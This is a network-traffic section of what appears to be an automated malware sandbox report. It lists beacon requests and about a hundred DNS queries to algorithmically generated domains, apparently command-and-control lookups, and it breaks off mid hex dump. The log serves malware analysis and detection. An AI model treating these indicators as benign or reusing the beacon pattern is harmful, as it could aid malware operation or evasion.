      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficDNS traffic detected: DNS query: gatyfus.com
      Source: global trafficDNS traffic detected: DNS query: lyvyxor.com
      Source: global trafficDNS traffic detected: DNS query: vojyqem.com
      Source: global trafficDNS traffic detected: DNS query: qetyfuv.com
      Source: global trafficDNS traffic detected: DNS query: gahyqah.com
      Source: global trafficDNS traffic detected: DNS query: puvyxil.com
      Source: global trafficDNS traffic detected: DNS query: lyryfyd.com
      Source: global trafficDNS traffic detected: DNS query: vocyzit.com
      Source: global trafficDNS traffic detected: DNS query: qegyqaq.com
      Source: global trafficDNS traffic detected: DNS query: purydyv.com
      Source: global trafficDNS traffic detected: DNS query: gacyzuz.com
      Source: global trafficDNS traffic detected: DNS query: lygymoj.com
      Source: global trafficDNS traffic detected: DNS query: vowydef.com
      Source: global trafficDNS traffic detected: DNS query: qexylup.com
      Source: global trafficDNS traffic detected: DNS query: pufymoq.com
      Source: global trafficDNS traffic detected: DNS query: gaqydeb.com
      Source: global trafficDNS traffic detected: DNS query: vofymik.com
      Source: global trafficDNS traffic detected: DNS query: qeqysag.com
      Source: global trafficDNS traffic detected: DNS query: puzylyp.com
      Source: global trafficDNS traffic detected: DNS query: gadyniw.com
      Source: global trafficDNS traffic detected: DNS query: lymysan.com
      Source: global trafficDNS traffic detected: DNS query: volykyc.com
      Source: global trafficDNS traffic detected: DNS query: qedynul.com
      Source: global trafficDNS traffic detected: DNS query: pumypog.com
      Source: global trafficDNS traffic detected: DNS query: galykes.com
      Source: global trafficDNS traffic detected: DNS query: lysynur.com
      Source: global trafficDNS traffic detected: DNS query: qekykev.com
      Source: global trafficDNS traffic detected: DNS query: pupybul.com
      Source: global trafficDNS traffic detected: DNS query: ganypih.com
      Source: global trafficDNS traffic detected: DNS query: lykyjad.com
      Source: global trafficDNS traffic detected: DNS query: qebytiq.com
      Source: global trafficDNS traffic detected: DNS query: vopybyt.com
      Source: global trafficDNS traffic detected: DNS query: gatyvyz.com
      Source: global trafficDNS traffic detected: DNS query: pujyjav.com
      Source: global trafficDNS traffic detected: DNS query: lyvytuj.com
      Source: global trafficDNS traffic detected: DNS query: vojyjof.com
      Source: global trafficDNS traffic detected: DNS query: qetyvep.com
      Source: global trafficDNS traffic detected: DNS query: puvytuq.com
      Source: global trafficDNS traffic detected: DNS query: lyryvex.com
      Source: global trafficDNS traffic detected: DNS query: gahyhob.com
      Source: global trafficDNS traffic detected: DNS query: vocyruk.com
      Source: global trafficDNS traffic detected: DNS query: qegyhig.com
      Source: global trafficDNS traffic detected: DNS query: purycap.com
      Source: global trafficDNS traffic detected: DNS query: gacyryw.com
      Source: global trafficDNS traffic detected: DNS query: lygygin.com
      Source: global trafficDNS traffic detected: DNS query: vowycac.com
      Source: global trafficDNS traffic detected: DNS query: pufygug.com
      Source: global trafficDNS traffic detected: DNS query: qexyryl.com
      Source: global trafficDNS traffic detected: DNS query: lyxywer.com
      Source: global trafficDNS traffic detected: DNS query: gaqycos.com
      Source: global trafficDNS traffic detected: DNS query: gadyfuh.com
      Source: global trafficDNS traffic detected: DNS query: lymyxid.com
      Source: global trafficDNS traffic detected: DNS query: qedyfyq.com
      Source: global trafficDNS traffic detected: DNS query: galyqaz.com
      Source: global trafficDNS traffic detected: DNS query: lysyfyj.com
      Source: global trafficDNS traffic detected: DNS query: vonyzuf.com
      Source: global trafficDNS traffic detected: DNS query: vonypom.com
      Source: global trafficDNS traffic detected: DNS query: vofygum.com
      Source: global trafficDNS traffic detected: DNS query: qeqyxov.com
      Source: global trafficDNS traffic detected: DNS query: puzywel.com
      Source: global trafficDNS traffic detected: DNS query: volyqat.com
      Source: global trafficDNS traffic detected: DNS query: pumyxiv.com
      Source: global trafficDNS traffic detected: DNS query: qekyqop.com
      Source: global trafficDNS traffic detected: DNS query: lyxylux.com
      Source: global trafficDNS traffic detected: DNS query: www.gahyqah.com
      Source: global trafficDNS traffic detected: DNS query: ww3.galyqaz.com
      Source: global trafficDNS traffic detected: DNS query: pupydeq.com
      Source: global trafficDNS traffic detected: DNS query: ganyzub.com
      Source: global trafficDNS traffic detected: DNS query: lykymox.com
      Source: global trafficDNS traffic detected: DNS query: vopydek.com
      Source: global trafficDNS traffic detected: DNS query: qebylug.com
      Source: global trafficDNS traffic detected: DNS query: pujymip.com
      Source: global trafficDNS traffic detected: DNS query: gatydaw.com
      Source: global trafficDNS traffic detected: DNS query: lyvylyn.com
      Source: global trafficDNS traffic detected: DNS query: vojymic.com
      Source: global trafficDNS traffic detected: DNS query: qetysal.com
      Source: global trafficDNS traffic detected: DNS query: puvylyg.com
      Source: global trafficDNS traffic detected: DNS query: gahynus.com
      Source: global trafficDNS traffic detected: DNS query: lyrysor.com
      Source: global trafficDNS traffic detected: DNS query: vocykem.com
      Source: global trafficDNS traffic detected: DNS query: qegynuv.com
      Source: global trafficDNS traffic detected: DNS query: purypol.com
      Source: global trafficDNS traffic detected: DNS query: gacykeh.com
      Source: global trafficDNS traffic detected: DNS query: lygynud.com
      Source: global trafficDNS traffic detected: DNS query: vowypit.com
      Source: global trafficDNS traffic detected: DNS query: qexykaq.com
      Source: global trafficDNS traffic detected: DNS query: pufybyv.com
      Source: global trafficDNS traffic detected: DNS query: gaqypiz.com
      Source: global trafficDNS traffic detected: DNS query: lyxyjaj.com
      Source: global trafficDNS traffic detected: DNS query: vofybyf.com
      Source: global trafficDNS traffic detected: DNS query: qeqytup.com
      Source: global trafficDNS traffic detected: DNS query: puzyjoq.com
      Source: global trafficDNS traffic detected: DNS query: gadyveb.com
      Source: global trafficDNS traffic detected: DNS query: lymytux.com
      Source: global trafficDNS traffic detected: DNS query: volyjok.com
      Source: global trafficDNS traffic detected: DNS query: qedyveg.com
      Source: global trafficDNS traffic detected: DNS query: galyhiw.com
      Source: global trafficDNS traffic detected: DNS query: lysyvan.com
      Source: global trafficDNS traffic detected: DNS query: qekyhil.com
      Source: global trafficDNS traffic detected: DNS query: vonyryc.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W2LPnI%2FmslKKxs3EOeWkxA5EJ5Ee0hsx49puHp4udNgQWXUwT4jBNZ26XWZRal3IhTXEMZExz0v2z0uFjm8vzKIYnCviToMj1rvtVV5ZwNFRn%2FSe8%2FMkoOh5f%2BDTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c9506ab12c326-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FiBHz1heGVZxchx3O08cZeZiPF8xkUf9Kj6hBDnm0aimNVpIWumT5JEOU0Ap93qO6Nd%2FeVLYEwIKkbbx2TAHKhOiukZG6X0ir15M3I%2Fu6xI4rF2CEHDkzVAXPXZNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c95161e647d0c-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="98.5",amp_style_sanitizer;dur="34.1",amp_tag_and_attribute_sanitizer;dur="37.1",amp_optimizer;dur="24.4"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CI3bpSNHDFuGNYd0oJ4jHNzvNm3TPa3FbKdcEidsTuDrpD4IjMpHhhbfmuTgeW7J%2BuGSLPcXxIiDjJqwisfGAm9QFBvubWP2cNcsOKSg59owJaPtUmcr%2F4CZygYnVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c9565cf78422b-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="42.8",amp_style_sanitizer;dur="17.2",amp_tag_and_attribute_sanitizer;dur="19.6",amp_optimizer;dur="17.2"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wmXPl4H3lnGaq8wJ03Ls33UfueLVhUX7ngG3VR0312p0U1%2FJv7bEifNzTAVESPBL1v8pLRPy06bCM9c8Lv16pzdl4jX2nFxN19tHmoOngQq1wBkAAz8hGSnTKLLwRA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c957fde8a4346-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkJxZ2bENh0IwZaZqePG7%2BBTYV%2BZf%2BMujWtx36pGR3OkXJIKhAHHcmiVY%2BmXOnZQjVu7nUie8vseIRlSihFlsW6PrBy%2FvU1YCNNs4xcR2biCNd%2FJ70L2bG6uhfe3%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c9640b83a0f88-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnF3EXksuUmW8G7Xy3uWgo3IZPagsRp7mUrDsP4d7e%2FOL8KIhiccdMKuvLW1%2Fd1pEzqtf%2FEpFJLS72TEOUrjYeOa8Kih7xLUPwFdBiaflP8rOErS3LlZVN%2F5iojKxg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c964aec4b7d08-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:48:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="81.7",amp_style_sanitizer;dur="46.2",amp_tag_and_attribute_sanitizer;dur="20.1",amp_optimizer;dur="26.5"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=balnk2OvRjmNFcWhCfW3sIe0dyET%2BLYvCnEMC1tn9XQe08uQgblv9beXs6s7gU4IaqoAot%2F04MHquKG%2Bf0cjRHxz0I8PWTBuCcT%2FbvCj%2F2DJu3PPeumy%2BEGbx2S6sQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c970c88ca43b1-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:48:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="52.8",amp_style_sanitizer;dur="26.4",amp_tag_and_attribute_sanitizer;dur="19.6",amp_optimizer;dur="27.1"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NfVqjriKKpLNfWAxfKuGGleCENU59WoMf0jwbq8Zs%2BUx7hxro3JyzI0jHO8AsLpCnI7RHtps24XGtsL1%2BRfXBF6ZMqJX0LM%2FkLmmj5P1H7gpGNhn%2BP0jX0oc7JEvQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c9727ae7a0f74-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:49:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOxX7ZabhGJtfHcIlKhKSvMyDxoHTvb5m8dF9kdoeh%2B%2FLcF8uGcdWD2q19o7JMHbyobMrjO%2BExr91qzbJpD3jEOXwle4sVyhIRHmx7MSjw%2Bfoi7hVrSc6BxHtOzYNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c97f05e457c82-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:49:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwGf3JCF6iWzNbjzMuuGFqoGw6V69VsQY4tEAyAbklo2p8mFQh9HH%2B4%2FPCT9uqqICWfsuoH9p%2FWwj3hm94Wuz29LgWXS9kHwMGSlvDsQcY1JgK1mXAjqW9hrnl%2Bmhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c97fe8f874349-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:47:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:47:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:04 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 